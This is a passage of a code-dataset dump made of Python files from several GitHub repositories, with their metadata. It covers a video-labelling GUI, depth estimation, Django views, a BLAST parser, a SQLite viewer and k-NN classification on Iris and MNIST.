e.key() == Qt.Key_S:\n label = \"Stealth\"\n if e.key() == Qt.Key_E:\n label = \"Explore\"\n if e.key() == Qt.Key_O:\n label = \"Other\"\n\n if label is not None:\n self.last_label = label\n self.label_recorder_process.record(\n frame_number=self.current_frame_number,\n label=label,\n frame=self.frame,\n )\n\n if not self.display_next_image():\n # Video ended\n self.write_labels_to_file(self.filename)\n self.status_bar.showMessage(\"VideoEnded\")\n self.filename = None\n if FASTAI:\n self.prediction_process.stop_event.set()\n if len(self.batch) > 0:\n self.load_file(self.batch.pop())\n\n def closeEvent(self, event):\n for proc in [self.image_reader_process, self.prediction_process, self.label_recorder_process]:\n if proc is not None:\n proc.stop_event.set()\n proc.join()\n\n\ndef main():\n application = QApplication(sys.argv)\n window = quickLabel()\n desktop = QDesktopWidget().availableGeometry()\n width = (desktop.width() - window.width()) / 2\n height = (desktop.height() - window.height()) / 2\n window.show()\n window.move(width, height)\n sys.exit(application.exec_())\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n main()\n", "repo_name": "alexisfcote/QuickLabel", "sub_path": "quicklabel/quicklabel.py", "file_name": "quicklabel.py", "file_ext": "py", "file_size_in_byte": 8943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 32, "usage_type": "attribute"}, {"api_name": "quicklabel.gui.quickLabelGUI", "line_number": 35, "usage_type": "name"}, {"api_name": "quicklabel.imagereaderprocess.ImageReaderProcess", "line_number": 59, "usage_type": "call"}, {"api_name": "quicklabel.labelrecorderprocess.LabelRecorderProcess", "line_number": 72, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 78, "usage_type": "name"}, {"api_name": "pkg_resources.resource_filename", "line_number": 79, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.PredictProcess", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 107, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 109, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 117, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 126, "usage_type": "call"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 131, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 139, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 149, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 157, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 163, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 165, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_RGB888", "line_number": 166, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 166, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 168, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 168, "usage_type": "name"}, {"api_name": "cv2.VideoWriter_fourcc", "line_number": 178, "usage_type": "call"}, {"api_name": 
"cv2.VideoWriter", "line_number": 179, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 187, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 189, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 189, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 194, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer.singleShot", "line_number": 195, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QTimer", "line_number": 195, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 201, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 201, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 206, "usage_type": "call"}, {"api_name": "re.search", "line_number": 215, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Key_Backspace", "line_number": 224, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 224, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_F", "line_number": 231, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 231, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_S", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 233, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_E", "line_number": 235, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 235, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Key_O", "line_number": 237, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 237, "usage_type": "name"}, {"api_name": "quicklabel.predictprocess.FASTAI", "line_number": 253, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 266, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 266, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QDesktopWidget", "line_number": 268, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 273, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 277, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 277, "usage_type": "attribute"}]} +{"seq_id": "13283130894", "text": "import cv2\nfrom PIL import Image\nimport os\nimport sys\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nfrom torchvision import transforms \nfrom bts import *\nimport utils\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu') \n\nclass DepthEstimation:\n def __init__(self, args):\n self.args = args\n \n def preprocess(self, image, gt_depth, gt_mask):\n assert isinstance(image, np.ndarray) , 'image must be np array'\n \n if self.dataset == 'diode':\n focal = Variable(torch.tensor([886.81])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth = utils.add_mask(gt_depth, gt_mask)\n gt_depth = gt_depth * 1000\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n\n elif self.dataset == 'realsense':\n focal = Variable(torch.tensor([886.81])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth[gt_depth > 9000] = 0\n gt_depth = gt_depth[45:472, 43:608] # crop dude to depth image pixel registration\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n image = image[45:472, 43:608]\n \n elif self.dataset == 'nyu':\n focal = 
Variable(torch.tensor([518.8579])).to(device)\n if isinstance(gt_depth, np.ndarray):\n gt_depth = gt_depth[45:472, 43:608]\n gt_depth = cv2.resize(gt_depth, (self.args.width, self.args.height), cv2.INTER_NEAREST)\n else: \n gt_depth = None\n \n elif self.dataset == 'kitti':\n focal = Variable(torch.tensor([715.0873])).to(device)\n \n image = cv2.resize(image, (self.args.width, self.args.height), cv2.INTER_NEAREST) \n return image, gt_depth, focal\n \n def post_process(self, pred_depth):\n if self.dataset == 'kitti':\n pred_depth = pred_depth.cpu().numpy().squeeze() * 256\n else:\n pred_depth = pred_depth.cpu().numpy().squeeze() * 1000\n colormap = cv2.applyColorMap(cv2.convertScaleAbs(pred_depth, alpha=0.0355), cv2.COLORMAP_JET)[...,::-1]\n\n return pred_depth, colormap\n \n def predict(self, model, image, gt_depth, dataset = 'realsense', gt_mask= None):\n self.dataset = dataset\n image, gt_depth, focal = self.preprocess(image, gt_depth, gt_mask)\n to_tensor = transforms.Compose([\n transforms.ToTensor(), \n transforms.Normalize([0.3947, 0.3610, 0.3366], [0.1965, 0.1943, 0.2006])\n ])\n tensor_img = to_tensor(Image.fromarray(image)).unsqueeze(0).to(device)\n *_, pred_depth = model(tensor_img, focal)\n pred_depth, colormap = self.post_process(pred_depth)\n \n return pred_depth, colormap\n \n def load_model(self, args): \n model_dir = os.path.dirname(args.model_path)\n sys.path.append(model_dir)\n model = BtsModel(args)\n model = torch.nn.DataParallel(model)\n checkpoint = torch.load(args.checkpoint)\n model.load_state_dict(checkpoint['model'])\n model.eval()\n model.to(device)\n \n return model\n \n ", "repo_name": "Elliot-ZM/my_projects", "sub_path": "depth_estimation/depth_estimation.py", "file_name": "depth_estimation.py", "file_ext": "py", "file_size_in_byte": 3394, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "torch.device", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 22, "usage_type": "attribute"}, {"api_name": "utils.add_mask", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 25, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 31, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 41, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.tensor", 
"line_number": 48, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.applyColorMap", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.convertScaleAbs", "line_number": 58, "usage_type": "call"}, {"api_name": "cv2.COLORMAP_JET", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 65, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 65, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 66, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 66, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 67, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 67, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 77, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 80, "usage_type": "call"}]} +{"seq_id": "43211489851", "text": "from django.shortcuts import render, redirect\nfrom .form import AddTaskForm, Task, ReportForm\nfrom django.contrib.auth.models import User,Group\n\n# Create your views here.\n\n\ndef add_task(request):\n form = AddTaskForm(request.POST)\n if request.method == 'POST':\n if form.is_valid():\n form.save()\n form = AddTaskForm()\n else:\n form = AddTaskForm()\n return render(request, 'AddTaskForm.html', {'form': form})\n\n\ndef Reports(request):\n form = ReportForm(request.POST)\n if request.method == 'POST':\n form.save()\n form = ReportForm()\n else:\n form = ReportForm()\n return render(request, 'Reports.html', {'form':form})\n\n\n\ndef showTaskExecutor(request):\n username = None\n if request.user.is_authenticated:\n username = request.user.username\n if request.user.is_authenticated:\n Tasks = Task.objects.filter(TaskExecutor = request.user)\n elif username == 'admin':\n Tasks = Task.objects.all()\n return render(request, 'TaskList.html', {'Tasks': Tasks})\n", "repo_name": "airdar/HelpDeck", "sub_path": "views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "form.AddTaskForm", "line_number": 9, "usage_type": "call"}, {"api_name": "form.is_valid", "line_number": 11, "usage_type": "call"}, {"api_name": "form.save", "line_number": 12, "usage_type": "call"}, {"api_name": "form.AddTaskForm", "line_number": 13, "usage_type": "call"}, {"api_name": "form.AddTaskForm", "line_number": 15, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "form.ReportForm", "line_number": 20, "usage_type": "call"}, {"api_name": "form.save", "line_number": 22, "usage_type": "call"}, {"api_name": "form.ReportForm", "line_number": 23, "usage_type": "call"}, {"api_name": "form.ReportForm", 
"line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "form.Task.objects.filter", "line_number": 35, "usage_type": "call"}, {"api_name": "form.Task.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "form.Task", "line_number": 35, "usage_type": "name"}, {"api_name": "form.Task.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "form.Task.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "form.Task", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "44978644888", "text": "# -*- coding: utf-8 -*-\n# @Time : 2021/8/11 15:27\n# @Author : Limusen\n# @File : demo_test_data_utils\n\n\nimport os\nfrom common.config_utils import local_config\nfrom common.excel_utils import ExcelUtils\n\ncurrent = os.path.dirname(__file__)\ndir_path = os.path.join(current, '..',local_config.test_datas_path)\n\n\nclass TestDataUtils:\n\n def __init__(self, test_suite_name, test_class_name):\n self.test_class_name = test_class_name\n self.excel_data = ExcelUtils(test_suite_name, dir_path).get_sheet_data_by_list()\n self.test_suite_counts = len(self.excel_data) - 1\n self.excel_rows = len(self.excel_data)\n\n def convert_excel_data_test_data(self):\n test_data_information = {}\n for row in range(1, self.excel_rows): # 循环总行数\n test_data_info = {} # 数据分层\n if self.excel_data[row][2].__eq__(self.test_class_name): # 判断传入的测试类是否与excel中数据一致\n test_data_info[\"test_name\"] = self.excel_data[row][1] # 取出测试名称\n test_data_info[\"is_not\"] = self.excel_data[row][3] # 取出是否执行\n test_data_info[\"excepted_result\"] = self.excel_data[row][4] # 取出期望结果\n test_parameter = {} # 测试数据需要用字典来读取\n for case_data in range(5, len(self.excel_data[row])): # 从第六个参数开始进行判断 因为测试数据可能有多个\n if self.excel_data[row][case_data].__contains__(\"=\") and len(\n self.excel_data[row][case_data]) > 2: # 分割测试数据并判断长度是否大于两个\n parameter_info = self.excel_data[row][case_data].split(\"=\")\n test_parameter[parameter_info[0]] = parameter_info[1]\n test_data_info['test_parameter'] = test_parameter\n test_data_information[self.excel_data[row][0]] = test_data_info\n return test_data_information\n\n\nif __name__ == \"__main__\":\n infos = TestDataUtils(\"login_suite\", \"LoginTest\").convert_excel_data_test_data()\n\n for i in infos.values():\n print(i)\n", "repo_name": "liousAlready/Pageui_Test", "sub_path": "sample/demo_test_data_utils.py", "file_name": "demo_test_data_utils.py", "file_ext": "py", "file_size_in_byte": 2155, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.config_utils.local_config.test_datas_path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "common.config_utils.local_config", "line_number": 12, "usage_type": "name"}, {"api_name": "common.excel_utils.ExcelUtils", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "5901865047", "text": "#!/usr/bin/env python3\n\nfrom Bio import SearchIO\nfrom pprint import pprint\nimport pandas as pd\nimport sys\nimport math\n\n\ndef parse_fai(fai):\n \"\"\"\n see https://samtools.github.io/hts-specs/tabix.pdf\n 
\"\"\"\n df = pd.read_csv(\n fai,\n sep=\"\\t\",\n header=None,\n names=[\"gene_name\", \"gene_len\", \"gene_beg\", \"gene_end\", \"total_bytes\"],\n )\n ave = sum(df[\"gene_len\"]) / len(df)\n df[\"ratio\"] = df[\"gene_len\"] / ave\n df[\"bgc\"] = df.apply(lambda x: x[\"gene_name\"].split(\"|\")[0], axis=1)\n return df.set_index(\"gene_name\").loc[:, [\"bgc\", \"gene_len\", \"ratio\"]]\n\n\ndef weight(evalue):\n return math.exp(-evalue)\n\n\n# BLAST tab format\n# qseqid sseqid pident length mismatch gapopen qstart qend sstart send evalue bitscore\n# qseqid sseqid pident length evalue\n\nBGC_GENE = parse_fai(sys.argv[1])\ni = 0\nblast_df = pd.DataFrame(\n columns=[\"read_id\", \"gene_name\", \"ident_pct\", \"aln_span\", \"evalue\"]\n)\nepsilon_dict = {}\n\nfor qr in SearchIO.parse(sys.stdin, format=\"blast-tab\"):\n # print(\"Search %s has %i hits\" % (qr.id, len(qr)))\n i += 1\n epsilon_dict[qr.id] = 1e-20\n evalue_weight_sum = 0\n for hit in qr.hits:\n for hsp in hit.hsps:\n # print(\"%s %s %s %s %s %s\" % (qr.id, hit.id, hsp.ident_pct, hsp.evalue, hsp.aln_span, cur))\n evalue_weight = weight(hsp.evalue)\n evalue_weight_sum += evalue_weight\n blast_df = blast_df.append(\n {\n \"read_id\": qr.id,\n \"gene_name\": hit.id,\n \"ident_pct\": hsp.ident_pct,\n \"aln_span\": hsp.aln_span,\n \"evalue\": hsp.evalue,\n \"evalue_weight\": evalue_weight,\n },\n ignore_index=True,\n )\n epsilon_dict[qr.id] = max(epsilon_dict[qr.id], evalue_weight_sum)\n if i > 4:\n break\n\n# blast_df = pd.merge(blast_df, BGC_GENE.reset_index(), on=\"gene_name\")\n# pprint(blast_df)\n# print(\"\\n\")\n# pprint(epsilon_dict)\n# print(\"\\n\")\n# sum_df = blast_df.groupby(\"read_id\")[\"evalue_weight\"].agg(max=max)\n# pprint(sum_df)\n# print(sum_df.loc[\"CL100103977L2C001R001_2429/2\", \"max\"])\n\nblast_df[\"gene_abun\"] = blast_df.apply(\n lambda x: x[\"evalue_weight\"]\n / BGC_GENE.loc[x[\"gene_name\"], \"ratio\"]\n / epsilon_dict[x[\"read_id\"]],\n axis=1\n)\npprint(blast_df)\n", "repo_name": "alienzj/bgctk", "sub_path": "blast_parse.py", "file_name": "blast_parse.py", "file_ext": "py", "file_size_in_byte": 2345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 27, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "Bio.SearchIO.parse", "line_number": 41, "usage_type": "call"}, {"api_name": "Bio.SearchIO", "line_number": 41, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pprint.pprint", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "2459730172", "text": "import sqlite3\nfrom sqlite3 import Error\n\n# Función para abrir una conexión a la base de datos SQLite\ndef abrir_conexion():\n conexion = None\n try:\n conexion = sqlite3.connect(\"ip.db\")\n print(\"Conexión a la base de datos SQLite exitosa.\")\n except Error as e:\n print(\"Error al abrir la base de datos:\", e)\n return conexion\n\n\ndef mostrar_contenido(conexion, consulta):\n try:\n cursor = conexion.cursor()\n cursor.execute(consulta)\n filas = cursor.fetchall()\n for fila in filas:\n print(fila)\n except Error as e:\n print(\"Error al ejecutar la consulta:\", e)\n\n\nconexion = abrir_conexion()\nif conexion is not None:\n consulta = \"SELECT * FROM ips\" # Reemplaza \"acc\" 
con el nombre de tu tabla\r\n    mostrar_contenido(conexion, consulta)\r\n    conexion.close()\r\n", "repo_name": "axelxsx07/Ips", "sub_path": "sql.py", "file_name": "sql.py", "file_ext": "py", "file_size_in_byte": 836, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sqlite3.connect", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 10, "usage_type": "name"}, {"api_name": "sqlite3.Error", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "30768001723", "text": "from django.contrib.auth import authenticate, login, get_user_model\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\nfrom .forms import ContactForm, LoginForm, RegisterForm\n\ndef home_page(request):\n    # print(request.session.get(\"first_name\", \"Unknown\"))\n    # request.session['first_name']\n    context = {\n        \"title\":\"Hello World!!\",\n        \"content\":\"Welcome to the home page!\"\n    }\n    if request.user.is_authenticated():\n        context[\"premium_content\"]=\"Now that you are logged in, you have full access. Enjoy!\"\n    return render(request, \"home_page.html\", context)\n\ndef about_page(request):\n    context = {\n        \"title\":\"Hello World!!\",\n        \"content\":\"Welcome to the about page!\"\n    }\n    return render(request, \"home_page.html\", context)\n\ndef contact_page(request):\n    contact_form = ContactForm(request.POST or None)\n    context = {\n        \"title\":\"Hello World!!\",\n        \"content\":\"Welcome to the contact page!\",\n        \"form\": contact_form\n    }\n    if contact_form.is_valid():\n        print(contact_form.cleaned_data)\n    if request.method == 'POST':\n        # print(request.POST)\n        print(request.POST.get('fullname'))\n        print(request.POST.get('email'))\n        print(request.POST.get('content'))\n\n    return render(request, \"contact/view.html\", context)\n\ndef login_page(request):\n    form = LoginForm(request.POST or None)\n    context = {\n        \"form\": form\n    }\n    print(\"User logged in\")\n    print(request.user.is_authenticated())\n    if form.is_valid():\n        print(form.cleaned_data)\n        username = form.cleaned_data.get(\"username\")\n        password = form.cleaned_data.get(\"password\")\n        user = authenticate(request, username=username, password=password)\n        print(request.user.is_authenticated())\n\n        if user is not None:\n            print(request.user.is_authenticated())\n            login(request, user)\n            # redirect to success page\n            # context['form'] = LoginForm()\n            return redirect(\"/login\")\n        else:\n            # return an 'invalid login' error message\n            print(\"error :(\")\n    \n    return render(request, \"auth/login.html\", context)\n\nUser = get_user_model()\ndef register_page(request):\n    form = RegisterForm(request.POST or None)\n    context = {\n        \"form\": form\n    }\n    if form.is_valid():\n        print(form.cleaned_data)\n        username = form.cleaned_data.get(\"username\")\n        password = form.cleaned_data.get(\"password\")\n        email = form.cleaned_data.get(\"email\")\n        new_user = User.objects.create_user(username, email, password)\n        print(new_user)\n    return render(request, \"auth/register.html\", context)\n\n\ndef home_page_old(request):\n    html_ = \"\"\"\n    <!doctype html>\n    <html lang=\"en\">\n    <head>\n        <meta charset=\"utf-8\">\n        <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n        <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->\n        <title>Bootstrap 101 Template</title>\n\n        <!-- Bootstrap -->\n        <link href=\"css/bootstrap.min.css\" rel=\"stylesheet\">\n\n        <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->\n        <!--[if lt IE 9]>\n          <script src=\"https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js\"></script>\n          <script src=\"https://oss.maxcdn.com/respond/1.4.2/respond.min.js\"></script>\n        <![endif]-->\n    </head>\n    <body>\n        <div class=\"container\">\n            <h1>Hello, world!</h1>\n        </div>\n\n        <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->\n        <script src=\"https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js\"></script>\n        <!-- Include all compiled plugins (below), or include individual files as needed -->\n        <script src=\"js/bootstrap.min.js\"></script>\n    </body>\n    </html>\n    \"\"\"\n    return HttpResponse(html_)", "repo_name": "devinaanderson/django-ecommerce", "sub_path": "ecommerce/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 26, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 40, "usage_type": "call"}, {"api_name": "forms.LoginForm", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 58, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 61, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 68, "usage_type": "call"}, {"api_name": "forms.RegisterForm", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "17954445013", "text": "import os\r\nimport struct\r\nimport torchvision\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom pandas import DataFrame, Series\r\nfrom sklearn.neighbors import KNeighborsClassifier # K-NN\r\n\r\n\r\ndef Iris():\r\n    # 创建数据\r\n    import sklearn.datasets as datasets\r\n\r\n    iris = datasets.load_iris()  # 数据:蓝蝴蝶\r\n    X = iris['data']\r\n    Y = iris['target']\r\n\r\n    # 训练集和测试集\r\n    from sklearn.model_selection import train_test_split\r\n\r\n    X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1, random_state=0, shuffle=True)\r\n\r\n    # 实例化\r\n    Knn = KNeighborsClassifier(n_neighbors=10)\r\n    Knn.fit(X_train, Y_train)\r\n    print('数据组结果:')\r\n    print('Score: ', Knn.score(X_train, Y_train))\r\n\r\n    y_pred = Knn.predict(X_test)\r\n    print('Target: ', Y_test)\r\n    print('Result: ', y_pred)\r\n\r\n\r\ndef load_mnist(path, kind):\r\n    \"\"\"Load MNIST data from `path`\"\"\"\r\n    labels_path = os.path.join(path,\r\n                               '%s-labels-idx1-ubyte'\r\n                               % kind)\r\n    images_path = os.path.join(path,\r\n                               '%s-images-idx3-ubyte'\r\n                               % kind)\r\n    with open(labels_path, 'rb') as lbpath:\r\n        magic, n = struct.unpack('>II',\r\n                                 lbpath.read(8))\r\n        labels = np.fromfile(lbpath,\r\n                             dtype=np.uint8)\r\n\r\n    with open(images_path, 'rb') as imgpath:\r\n        magic, num, rows, cols = struct.unpack('>IIII',\r\n                                               imgpath.read(16))\r\n        images = np.fromfile(imgpath,\r\n                             dtype=np.uint8).reshape(len(labels), 784)\r\n\r\n    return images, labels\r\n\r\n\r\n\r\ndef MyMnist():\r\n    X_train, Y_train = load_mnist('./datasets/MNIST/raw', kind='train')\r\n    X_test, Y_test = load_mnist('./datasets/MNIST/raw', kind='t10k')\r\n    X_train, Y_train, X_test, Y_test = X_train[:10000, :], Y_train[:10000], X_test[:30, :], Y_test[:30]\r\n    # print(X_train.shape)\r\n    print('MNIST数据组结果:')\r\n    knn = KNeighborsClassifier(n_neighbors=3)\r\n    knn.fit(X_train, Y_train)\r\n    print('Score: ', knn.score(X_train, Y_train))\r\n\r\n    y_pred = knn.predict(X_test)\r\n    print('Target: ', Y_test)\r\n    print('Result: ', y_pred)\r\n\r\n    '''可视化看一下数据'''\r\n    # fig, ax = plt.subplots(\r\n    #     nrows=2,\r\n    #     ncols=5,\r\n    #     sharex=True,\r\n    #     sharey=True, )\r\n    #\r\n    # ax = ax.flatten()\r\n    # for i in range(10):\r\n    #     img = X_train[Y_train == i][0].reshape(28, 28)\r\n    #     ax[i].imshow(img, cmap='Greys', 
interpolation='nearest')\n #\n # ax[0].set_xticks([])\n # ax[0].set_yticks([])\n # plt.tight_layout()\n # plt.show()\n\n\nif __name__ == '__main__':\n Iris()\n MyMnist()\n", "repo_name": "Arvin117/100-Day-ML", "sub_path": "D7_KNN.py", "file_name": "D7_KNN.py", "file_ext": "py", "file_size_in_byte": 2723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "sklearn.datasets.load_iris", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 15, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 44, "usage_type": "call"}, 